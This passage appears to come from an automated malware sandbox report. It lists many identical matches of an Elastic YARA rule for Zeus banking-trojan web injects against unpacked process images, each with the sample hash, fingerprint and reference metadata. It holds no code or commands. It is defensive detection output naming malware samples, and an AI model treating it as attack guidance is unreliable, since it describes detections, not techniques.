Source: 0.3.Bonelessness.exe.86e060.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bonelessness.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.407000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 23.2.JbrLYfXaOpqnSngA.exe.c40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.JbrLYfXaOpqnSngA.exe.3012000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.JbrLYfXaOpqnSngA.exe.2652000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.JbrLYfXaOpqnSngA.exe.2962000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.JbrLYfXaOpqnSngA.exe.2342000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 23.2.JbrLYfXaOpqnSngA.exe.c40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bonelessness.exe.406400.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.33.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bonelessness.exe.407000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.17.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.44.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.2606000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.34.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.2570000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.JbrLYfXaOpqnSngA.exe.d52000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.JbrLYfXaOpqnSngA.exe.2652000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.44.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.40.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
